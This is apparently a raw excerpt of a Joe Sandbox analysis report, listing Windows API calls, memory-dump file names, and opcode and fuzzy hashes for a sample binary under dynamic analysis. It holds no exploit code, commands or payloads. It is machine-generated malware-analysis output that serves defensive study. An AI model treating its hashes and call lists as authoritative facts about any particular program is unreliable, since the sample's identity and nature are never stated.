                                                                                                                                                      APIs
                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005C6220
                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005C624D
                                                                                                                                                      • DrawMenuBar.USER32(?), ref: 005C625C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                                                                                      • String ID: 0
                                                                                                                                                      • API String ID: 3227129158-4108050209
                                                                                                                                                      • Opcode ID: 80c62dd772bcb59e6e41081c54a036dfb1836e2cf82078deccead6172fd4c177
                                                                                                                                                      • Instruction ID: 53a3696dd5798e273c8b5f6d9e1071302da08c9b84789abc131886bcc0f7422a
                                                                                                                                                      • Opcode Fuzzy Hash: 80c62dd772bcb59e6e41081c54a036dfb1836e2cf82078deccead6172fd4c177
                                                                                                                                                      • Instruction Fuzzy Hash: E3016975500618AFDB209F91DC88FAEBFB4FF84351F1480AAF849D6151DB308A98EF21
                                                                                                                                                      APIs
                                                                                                                                                      • GetForegroundWindow.USER32(?,006028B0,005CACC3,000000FC,?,00000000,00000000,?), ref: 005C8164
                                                                                                                                                      • GetFocus.USER32 ref: 005C816C
                                                                                                                                                        • Part of subcall function 00532441: GetWindowLongW.USER32(00000000,000000EB), ref: 00532452
                                                                                                                                                        • Part of subcall function 005321E4: GetWindowLongW.USER32(?,000000EB), ref: 005321F2
                                                                                                                                                      • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 005C81D9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                                      • String ID: Hb
                                                                                                                                                      • API String ID: 3601265619-1270690246
                                                                                                                                                      • Opcode ID: 943d7aa9ac7af4ce0fad70baa530560f169915c1aa00d6271a12c25f32437285
                                                                                                                                                      • Instruction ID: 465767ddd010500627c990988c7e72b7d162204a229b3be0e68e3fc225221e72
                                                                                                                                                      • Opcode Fuzzy Hash: 943d7aa9ac7af4ce0fad70baa530560f169915c1aa00d6271a12c25f32437285
                                                                                                                                                      • Instruction Fuzzy Hash: 5F015E312009118FC72ADB69DC58F763BF6FF8A324F18026EE815872A0DB316D46CB10
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3b8c056a38a8c710cf27ee7d03187272390c7503b3828638a97c622ea8ada5ea
                                                                                                                                                      • Instruction ID: d66a30e5be02a811aa060a1764ef4a0b5d8f9593bfd296667e594777b3c71f25
                                                                                                                                                      • Opcode Fuzzy Hash: 3b8c056a38a8c710cf27ee7d03187272390c7503b3828638a97c622ea8ada5ea
                                                                                                                                                      • Instruction Fuzzy Hash: 7EC16C75A0021AEFDB14CF94C894EAEBBB5FF88704F109998E505EB291D731ED81DB90
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,005D0BD4,?), ref: 00590E80
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,005D0BD4,?), ref: 00590E98
• CLSIDFromProgID.OLE32(?,?,00000000,005CDCE0,000000FF,?,00000000,00000800,00000000,?,005D0BD4,?), ref: 00590EBD
• _memcmp.LIBVCRUNTIME ref: 00590EDE
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 005B245A
• WSAGetLastError.WSOCK32 ref: 005B2468
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 005B24E7
• WSAGetLastError.WSOCK32 ref: 005B24F1
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 005A60DD
• GetLastError.KERNEL32(?,00000000), ref: 005A6103
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 005A6128
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 005A6154
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
APIs
• GetForegroundWindow.USER32 ref: 005C204A
  • Part of subcall function 005942CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 005942E6
  • Part of subcall function 005942CC: GetCurrentThreadId.KERNEL32 ref: 005942ED
  • Part of subcall function 005942CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00592E43), ref: 005942F4
• GetCaretPos.USER32(?), ref: 005C205E
• ClientToScreen.USER32(00000000,?), ref: 005C20AB
• GetForegroundWindow.USER32 ref: 005C20B1
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
APIs
  • Part of subcall function 00534154: _wcslen.LIBCMT ref: 00534159
• _wcslen.LIBCMT ref: 0059E7F7
• _wcslen.LIBCMT ref: 0059E80E
• _wcslen.LIBCMT ref: 0059E839
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0059E844
Similarity
• API ID: _wcslen$ExtentPoint32Text
• String ID:
• API String ID: 3763101759-0
APIs
  • Part of subcall function 0059960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00598199,?,000000FF,?,00598FE3,00000000,?,0000001C,?,?), ref: 0059961B
  • Part of subcall function 0059960C: lstrcpyW.KERNEL32(00000000,?,?,00598199,?,000000FF,?,00598FE3,00000000,?,0000001C,?,?,00000000), ref: 00599641
  • Part of subcall function 0059960C: lstrcmpiW.KERNEL32(00000000,?,00598199,?,000000FF,?,00598FE3,00000000,?,0000001C,?,?), ref: 00599672
• lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00598FE3,00000000,?,0000001C,?,?,00000000), ref: 005981B2
• lstrcpyW.KERNEL32(00000000,?,?,00598FE3,00000000,?,0000001C,?,?,00000000), ref: 005981D8
• lstrcmpiW.KERNEL32(00000002,cdecl,?,00598FE3,00000000,?,0000001C,?,?,00000000), ref: 00598213
Strings
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
                                                                                                                                                      • Opcode ID: 3ec50fa0a55a48760d8c846aefaca26b1ee595049513c287bbe2aa345d177ec7
                                                                                                                                                      • Instruction ID: 4b5bc1b7a56a2a51c77b0c678b2335373957da03bdc83b44c0cf922668249113
                                                                                                                                                      • Opcode Fuzzy Hash: 3ec50fa0a55a48760d8c846aefaca26b1ee595049513c287bbe2aa345d177ec7
                                                                                                                                                      • Instruction Fuzzy Hash: F711033A200702AFCF145F39C858E7A7BB9FF99750B50402AF902CB290EF729801D7A1
                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 005C866A
                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 005C8689
                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 005C86A1
                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,005AC10A,00000000), ref: 005C86CA
                                                                                                                                                        • Part of subcall function 00532441: GetWindowLongW.USER32(00000000,000000EB), ref: 00532452
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 847901565-0
                                                                                                                                                      • Opcode ID: 3075b3321d32e72ab399954b42fcf1b13ae04ba09c9725c37ada5bf72c325a94
                                                                                                                                                      • Instruction ID: 5f3e5d4a5fe0b79fb6657ecfa7ce914affbe6627580597f584e0ec72e6140abb
                                                                                                                                                      • Opcode Fuzzy Hash: 3075b3321d32e72ab399954b42fcf1b13ae04ba09c9725c37ada5bf72c325a94
                                                                                                                                                      • Instruction Fuzzy Hash: EE119D32500625AFCB108FA9CC08FAB3BA5FB55360F154729F939DB2E0DB308991DB50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f6e1b9ecd000e6e628859e74c7a7c0392b4bdb78bba97b3f4ceb4345476aa5d8
                                                                                                                                                      • Instruction ID: a0b9b91c54a6fc06f9b2c597279802cdae98bc3eb260dfb2bdf3bf7304c10efa
                                                                                                                                                      • Opcode Fuzzy Hash: f6e1b9ecd000e6e628859e74c7a7c0392b4bdb78bba97b3f4ceb4345476aa5d8
                                                                                                                                                      • Instruction Fuzzy Hash: 0901DFB2209A063EE72026786CC9F276B1DEF923B8F340329B621A21D1EE708C419170
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 005922D7
                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005922E9
                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005922FF
                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0059231A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                      • Opcode ID: 54ecb0de14cf2ea55b84a2a973043d007edbee04fd9e44e614dfacc35ee60da4
                                                                                                                                                      • Instruction ID: c3a3b9de32a5336977b69108a89cf160657f1a8bfa2087a5c04d10ffe638bd82
                                                                                                                                                      • Opcode Fuzzy Hash: 54ecb0de14cf2ea55b84a2a973043d007edbee04fd9e44e614dfacc35ee60da4
                                                                                                                                                      • Instruction Fuzzy Hash: E011093A940219FFEF119BA5CD85F9DFBB8FB08750F200491EA00B7290D6716E10DB94
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00532441: GetWindowLongW.USER32(00000000,000000EB), ref: 00532452
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 005CA890
                                                                                                                                                      • GetCursorPos.USER32(?), ref: 005CA89A
                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 005CA8A5
                                                                                                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 005CA8D9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4127811313-0
                                                                                                                                                      • Opcode ID: 36d46c25472363b8c4704c4cea452b6adc39df5bbb0433000839bbcd0e82dc9e
                                                                                                                                                      • Instruction ID: 4f7182db5729a3c38d3f643bfc89e4eec88c5f4eb0a3a4455b3c5528689d7dce
                                                                                                                                                      • Opcode Fuzzy Hash: 36d46c25472363b8c4704c4cea452b6adc39df5bbb0433000839bbcd0e82dc9e
                                                                                                                                                      • Instruction Fuzzy Hash: 8A11287190051EEFEF149F94D849EEE7FB8FB44308F004469E911E2190D730AA86DBA2
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0059EA29
                                                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 0059EA5C
                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0059EA72
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0059EA79
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2880819207-0
                                                                                                                                                      • Opcode ID: 571f48143885dba1bfa8844d979c428b9f3641836c9de511f256d570bb41e8b4
                                                                                                                                                      • Instruction ID: f940e7bacb59a543e1edc924ac1afadd0552990099dcd864987760b511d80ac1
                                                                                                                                                      • Opcode Fuzzy Hash: 571f48143885dba1bfa8844d979c428b9f3641836c9de511f256d570bb41e8b4
                                                                                                                                                      • Instruction Fuzzy Hash: 4811A576904259AFCB15EBA89C0AA9B7FAEFB45310F044266F825D3290D675890487B1
                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 005C8792
                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 005C87AA
                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 005C87CE
                                                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 005C87E9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 357397906-0
                                                                                                                                                      • Opcode ID: f1c9cb7614955e7ebd02277e9945728905d1dfe4e95c4b2a4eecd0317502bb14
                                                                                                                                                      • Instruction ID: 91677351b65225ff1ee22ef29457a812b5bf987cac4b44331cb5b92bdd064a25
                                                                                                                                                      • Opcode Fuzzy Hash: f1c9cb7614955e7ebd02277e9945728905d1dfe4e95c4b2a4eecd0317502bb14
                                                                                                                                                      • Instruction Fuzzy Hash: C51114B9D00209EFDB41DF98C884AEEBBF5FB18314F104166E915E3610D735AA95DF50
                                                                                                                                                      APIs
                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 0053216C
                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00532176
• SetBkMode.GDI32(?,00000001), ref: 00532189
• GetStockObject.GDI32(00000005), ref: 00532191
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Color$ModeObjectStockText
• String ID:
• API String ID: 4037423528-0
• Opcode ID: a89a230d3e64573b9694347f50e4e976833715dd5fd95731eb04ddec4d671492
• Instruction ID: 734ca61cc7f0d83032dbb4db1bc41d9629befe958101890fbc247c66f07a410a
• Opcode Fuzzy Hash: a89a230d3e64573b9694347f50e4e976833715dd5fd95731eb04ddec4d671492
• Instruction Fuzzy Hash: 2FE0E531644A40AEDB215B75BC09BD97F71AB22335F18C225F6BA940E1C7724645FB21
APIs
• GetDesktopWindow.USER32 ref: 0058EBD6
• GetDC.USER32(00000000), ref: 0058EBE0
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0058EC00
• ReleaseDC.USER32(?), ref: 0058EC21
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 5f28833599b9798dcf1b3cb9d7ef01736df7affb0a0a640a73a248d483867e3f
• Instruction ID: de4ad618e58821d94febdf68135185482fab4d98b1e60eb38ea12237444e536e
• Opcode Fuzzy Hash: 5f28833599b9798dcf1b3cb9d7ef01736df7affb0a0a640a73a248d483867e3f
• Instruction Fuzzy Hash: A9E01AB5900A01EFCF50AFA0980DE6DBFB1FB58311F108859E84AE3250CB384985EF20
APIs
• GetDesktopWindow.USER32 ref: 0058EBEA
• GetDC.USER32(00000000), ref: 0058EBF4
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0058EC00
• ReleaseDC.USER32(?), ref: 0058EC21
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 32a3d70d9d4f9b4efdfc7da9582ffc45b80034db81cb7b9d593a3c9744064887
• Instruction ID: de0064f649faffeb55be7ebc3df9c3b8f2d122be8ea482ceb520fb0b64f6d6fb
• Opcode Fuzzy Hash: 32a3d70d9d4f9b4efdfc7da9582ffc45b80034db81cb7b9d593a3c9744064887
• Instruction Fuzzy Hash: D7E01AB5900A01DFCF509FA0980DA6DBBB1FB58314F108459E94AE3250C7385945EF20
APIs
• __startOneArgErrorHandling.LIBCMT ref: 0055E69D
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: 14af7d87c69dacc9ca5552e82e6f5e618ba331a8b994796d45aa6ffb8e9b0796
• Instruction ID: dc7e7972ecc41d3282a3a66bfcb2f8f59f2c4a01fae1f42a3ab033cb66c355cb
• Opcode Fuzzy Hash: 14af7d87c69dacc9ca5552e82e6f5e618ba331a8b994796d45aa6ffb8e9b0796
• Instruction Fuzzy Hash: 36517A61A0910286CB197714DD2637A2FA4FB60741F304F6BE8D5432E9EF348ECDDA46
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID:
• String ID: #
• API String ID: 0-1885708031
• Opcode ID: c4cbe0321d36fc3802c1a46415904b5d4a0ebc7b1dad8902299c04c11b48ab11
• Instruction ID: 068c729d55da7bb183fe6c622a9bbc29db5a1e018416555eb21653ad045173bd
• Opcode Fuzzy Hash: c4cbe0321d36fc3802c1a46415904b5d4a0ebc7b1dad8902299c04c11b48ab11
• Instruction Fuzzy Hash: A3512F36504247DFDF25EF28C484AFA7FA0FF55318FA44059EC91AB2A1DA30AD46CB61
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
